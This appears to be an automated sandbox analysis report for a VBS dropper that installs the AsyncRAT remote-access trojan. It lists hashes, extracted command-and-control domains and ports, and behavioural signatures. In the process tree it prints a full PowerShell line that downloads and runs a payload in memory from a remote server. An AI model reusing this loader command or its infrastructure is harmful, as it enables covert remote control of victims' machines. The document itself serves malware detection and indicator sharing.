Analysis
-
max time kernel
126s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
30-09-2022 14:41
Static task
static1
Behavioral task
behavioral1
Sample
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
Resource
win10v2004-20220812-en
Behavioral task
behavioral3
Sample
URFT06GSBAWRP_001_PDF/URFT06GSBAWRP_001_PDF.exe
Resource
win7-20220901-en
Behavioral task
behavioral4
Sample
URFT06GSBAWRP_001_PDF/URFT06GSBAWRP_001_PDF.exe
Resource
win10v2004-20220812-en
General
-
Target
URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
-
Size
219KB
-
MD5
86d9cdbe85e0b345c00063cb59efda75
-
SHA1
6990625fff03cdc505a7c9a224c39fb9c1b1ab80
-
SHA256
541752eae29c171bb8ab3f5851b6f58ba58035298b8781990998d22cd4982f6e
-
SHA512
0f39d5b741cb5fc822f17306537a4659c5ff191f18ef47e18aa3f604eb9d4598f1c01316068285531916a57bd0410b27fd8d44adb3bda41ee691098cd5b1bc2f
-
SSDEEP
48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgu:xKWdUIlVc8WGvXimF
Malware Config
Extracted
http://20.7.14.99/dll/dll_ink.pdf
Extracted
asyncrat
0.5.7B
Default
petersonsherian7.duckdns.org:6739
petersonsherian7.duckdns.org:7301
petersonsherian7.duckdns.org:7808
petersonsherian7.duckdns.org:8333
petersonsherian7.duckdns.org:6112
slpete1533.duckdns.org:6739
slpete1533.duckdns.org:7301
slpete1533.duckdns.org:7808
slpete1533.duckdns.org:8333
slpete1533.duckdns.org:6112
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3176-138-0x000000000040C7CE-mapping.dmp asyncrat behavioral2/memory/3176-137-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 8 2512 powershell.exe 12 2512 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 1 IoCs
Processes:
powershell.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk powershell.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2512 set thread context of 3176 2512 powershell.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 2512 powershell.exe 2512 powershell.exe 4236 powershell.exe 4236 powershell.exe 2512 powershell.exe 2512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 2512 powershell.exe Token: SeDebugPrivilege 4236 powershell.exe Token: SeDebugPrivilege 3176 RegAsm.exe -
Suspicious use of WriteProcessMemory 15 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 1928 wrote to memory of 2512 1928 WScript.exe powershell.exe PID 1928 wrote to memory of 2512 1928 WScript.exe powershell.exe PID 2512 wrote to memory of 4236 2512 powershell.exe powershell.exe PID 2512 wrote to memory of 4236 2512 powershell.exe powershell.exe PID 2512 wrote to memory of 3460 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3460 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3460 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3176 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3176 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3176 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3176 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3176 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3176 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3176 2512 powershell.exe RegAsm.exe PID 2512 wrote to memory of 3176 2512 powershell.exe RegAsm.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Blocklisted process makes network request
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\Windows\Temp\Debug.vbs3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD56b49e8f169d2f316e251bb33b6966426
SHA172269ec042c9953fbe2465cd343034b7a7b810a8
SHA2560f5bbb69b875c76e5430b8d3175df55d2cb25cb42b423de593c4d03740d4c506
SHA512b1e3189a8908e2891623302b466f44a55d7afbf1e786b619098242fde5b5c29322f44026a540e9b0b67885c72b0903be7470f5df5608be2e16388ec10e27b952
-
memory/2512-133-0x0000018A9B8C0000-0x0000018A9B8E2000-memory.dmpFilesize
136KB
-
memory/2512-134-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmpFilesize
10.8MB
-
memory/2512-132-0x0000000000000000-mapping.dmp
-
memory/2512-141-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmpFilesize
10.8MB
-
memory/3176-144-0x0000000006100000-0x0000000006166000-memory.dmpFilesize
408KB
-
memory/3176-138-0x000000000040C7CE-mapping.dmp
-
memory/3176-137-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB
-
memory/3176-142-0x0000000005FF0000-0x000000000608C000-memory.dmpFilesize
624KB
-
memory/3176-143-0x0000000006640000-0x0000000006BE4000-memory.dmpFilesize
5.6MB
-
memory/3176-145-0x0000000006EB0000-0x0000000006F26000-memory.dmpFilesize
472KB
-
memory/3176-146-0x0000000006F30000-0x0000000006F4E000-memory.dmpFilesize
120KB
-
memory/3176-147-0x0000000007020000-0x00000000070B2000-memory.dmpFilesize
584KB
-
memory/4236-136-0x00007FFCC3CB0000-0x00007FFCC4771000-memory.dmpFilesize
10.8MB
-
memory/4236-135-0x0000000000000000-mapping.dmp